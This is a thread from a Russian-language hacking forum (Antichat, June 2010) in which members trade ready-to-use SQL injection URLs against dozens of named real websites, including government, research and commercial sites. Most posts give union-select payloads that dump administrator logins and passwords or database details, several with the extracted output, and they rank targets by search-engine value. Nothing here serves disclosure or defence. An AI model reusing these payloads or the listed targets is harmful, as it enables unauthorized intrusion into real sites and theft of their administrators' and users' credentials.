ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12401  
Старый 17.06.2010, 13:09
Аватар для FAQ666
FAQ666
Познающий
Регистрация: 17.09.2008
Сообщений: 56
Провел на форуме:
587324

Репутация: 40
По умолчанию

Яндекс тИЦ (CY) 1000
Google PageRank (PR) 5

Код:
http://tp.tatcenter.ru/goods-information.php?&gid=344646+union+select+1,concat_ws(0x3a,login,password,permissions),3,4+from+admins+--+a
Код:
http://tp.tatcenter.ru/goods-information.php&gid=344646+union+select+1,group_concat(table_name),3,4+from+information_schema.columns+where+column_name+like+0x2570617325+--+a
админка:
Код:
http://tp.tatcenter.ru/admin/
если покопаться то можно вытащить пасы от админок с других поддоменов. . . .

Последний раз редактировалось FAQ666; 17.06.2010 в 13:12..
 
Ответить с цитированием

  #12402  
Старый 17.06.2010, 13:46
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.latakia-city.gov.sy/index.php?p_name=news_item_view&id=-29+union+select+1,2,3,4,5,6,7,8,9,10,group_concat( username,char(58),password),12+from+admins
 
Ответить с цитированием

  #12403  
Старый 17.06.2010, 13:52
Аватар для life_glider
life_glider
Познающий
Регистрация: 13.04.2010
Сообщений: 42
Провел на форуме:
460968

Репутация: 81
По умолчанию

http://www.veroint.com/products.php?page_id=-1%20union%20select%201,2,3,group_concat(table_name )%20from%20information_schema.tables%20where%20TAB LE_ROWS%3E0
 
Ответить с цитированием

  #12404  
Старый 17.06.2010, 14:15
Аватар для AC//DC
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию

Код:
http://www.hipertin.ru/index.php?id=-172+and+1=2+union+select+1,concat_ws(0x3a,@@version,database(),user(),@@version_compile_os),3--
version : 4.0.27-log
user : hipertin@zvm21.host.ru
database : hipertin
os : i86pc-solaris2.9
 
Ответить с цитированием

  #12405  
Старый 17.06.2010, 14:21
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.store-apple.ru/catalog.htm?product_id=10+UNION+SELECT+1,2,concat_ ws(0x3a,version(),database(),user(),@@version_comp ile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19

Database Version: 5.0.90-community
Database name: itbala_iphonezakaz
User name: itbala_alex@localhost
Os:unknown-linux-gnu
 
Ответить с цитированием

  #12406  
Старый 17.06.2010, 16:29
Аватар для FAQ666
FAQ666
Познающий
Регистрация: 17.09.2008
Сообщений: 56
Провел на форуме:
587324

Репутация: 40
По умолчанию

Яндекс тИЦ (CY) 425
Google PageRank (PR) 5
Посещалка - 11к

Код:
http://www.fashionbank.ru/models/user/-1330'+union+select+group_concat(table_name,':',table_schema,';'),2,3,database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85+from+information_schema.columns+where+column_name+like+0x2570617325+--+a.html
Код:
http://www.fashionbank.ru/models/user/-1330'+union+select+concat_ws(0x3a,login,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85+from+stat.cns_users+--+a.html

Последний раз редактировалось Jokester; 17.06.2010 в 16:37.. Причина: пароли
 
Ответить с цитированием

  #12407  
Старый 17.06.2010, 16:43
Аватар для rbul
rbul
Новичок
Регистрация: 19.05.2010
Сообщений: 4
Провел на форуме:
188246

Репутация: 1
По умолчанию

PR 8


Код:
http://www.poseidon.hcmr.gr/listview.php?id=-18+union+select+concat%28username,0x3a,password%29+from+ecsusers+limit+0,1%20--
5.0.77
www_poseidon@iris5004.ath.hcmr.gr
project_poseidon
 
Ответить с цитированием

Портал русскоязычной группы пользователей Sybase
  #12408  
Старый 17.06.2010, 16:44
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию Портал русскоязычной группы пользователей Sybase

http://www.rusug.ru/index.php?tree=8&mode=view&id=-7+union+select+concat_ws(0x3a,version(),database() ,user(),@@version_compile_os),2,3,4,5,6/*

5.0.26-log:ikarhomcen_rusug:ikarhomcen_rusug@localhost:pc-linux-gnu
 
Ответить с цитированием

  #12409  
Старый 17.06.2010, 17:47
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

http://www.ttparliament.org/publications.php?mid=-1)+or(1,1)=(select+count(0),concat((select+databas e()+from+cms_menus_configs+limit+0,1),floor(rand(0 )*2))from(cms_menus_configs)group+by+2)--+
 
Ответить с цитированием

  #12410  
Старый 17.06.2010, 17:54
Аватар для DezMond™
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

lefuretscience.fr пр2
Код:
http://lefuretscience.fr/video.php?num=-701+uNIon+sELEct+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a3a,groupval,pwd,name,mail)+from+ntux2_users+--+
scopeconcept.fr пр2
Код:
http://www.scopeconcept.fr/blog/eros/vision/modif.php?id=-1260+union+select+1,2,3,group_concat(table_name),5,6,7,8+from+information_schema.tables+--+
briefkasten-finden.de пр2
Код:
http://briefkasten-finden.de/briefkasten.php?briefkasten_id=-134+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.tables+--+
sitecgroup.com пр4
Код:
http://sitecgroup.com/vacancies/vacancy_search.php?recID=-1508+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+
btsati.org пр3
Код:
http://www.btsati.org/Ancien/fiche_entreprise.php?entreprise=-83+union+select+concat_ws(0x3a3a,login,pwd),2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+admin+--+
koelner-gastronacht.de пр2
Код:
http://www.koelner-gastronacht.de/liste.php?id=-5+union+select+1+--+
francknet.net
Код:
http://www.francknet.net/details.php?recnum=-1069'+union+select+1,2,3,4,5,group_concat(table_name)+from+information_schema.tables+--+&num_cd=99
jardin-aromes.com пр2
Код:
http://www.jardin-aromes.com/actu.php?id_art=-26+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+
snoci-charpente-vendee.fr пр2
Код:
http://www.snoci-charpente-vendee.fr/actu/index.php?id_art=-12+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables+--+
cancheauthietourisme.com пр3
Код:
http://cancheauthietourisme.com/liste.php?categorie=-1+union+select+1,2,3+from+information_schema.tables+--+
deutz-teilemarkt.de пр1
Код:
http://www.deutz-teilemarkt.de/liste.php?art=angebot&kat=2&unterkat=-9+union+select+1,2,3,4,id,6,7,8,9,10,11,12,13,14,15,16,17,18+from+user+--+
triathlon-service.de пр3
Код:
http://www.triathlon-service.de/ergebnisse/liste.php?nr=-2361+union+select+1,2,3,4,concat_Ws(0x3a3a,nr,email,name,pw),6+from+user+--+
si.loin.si.proche.free.fr пр1
Код:
http://si.loin.si.proche.free.fr/journal.php?gstrLangue=fr&IdSkin=_2010&id_modal=2+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15+--+
batali.fr
Код:
http://batali.fr/journal.php?num=-9+union+select+1,2,3,4,5,6,7,8+--+
sainte-menehould.fr пр4
Код:
http://www.sainte-menehould.fr/demo.php?frame_c=-48'+union+select+concat_ws(0x3a3a,g_id,g_userName,g_fullName,g_hashedPassword,g_email)+from+g2_User+limit+1,1+--+&parent=2
fin-audit.ru пр3 тиц40
Код:
http://www.fin-audit.ru/pub.php?id=-9'+union+select+1,2,3,4,5,6+--+&limit=0'
apb.thecomplex.com
Код:
http://apb.thecomplex.com/view_group.php?id=-9+union+select+1,2,3,4,5,6,7,8+union+select+1,2,3,4,5,6,7,8+--+
cyrillignac.com пр3
Код:
http://www.cyrillignac.com/cuisine/recettes_detail.php?id=-11+union+select+1,table_name,3,4,5,6,7,8,9+from+information_schema.tables+--+
academiatribus.com
Код:
http://www.academiatribus.com/popfoto.php?CodFoto=-111+union+select+user(),2+--+
cafepuertorico.com пр3
Код:
http://www.cafepuertorico.com/popfoto.php?id=17+union+select+1,2,3,group_concat(table_name)+from+information_schema.tables+--+&eleccion=1
easynudes.com AlexRang 76753
Код:
http://www.easynudes.com/videos/player2.php?id=-41179+union+select+1,concat_ws(0x3a3a,id,username,password),3,4,5,6+from+tps_users+--+&from=c
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ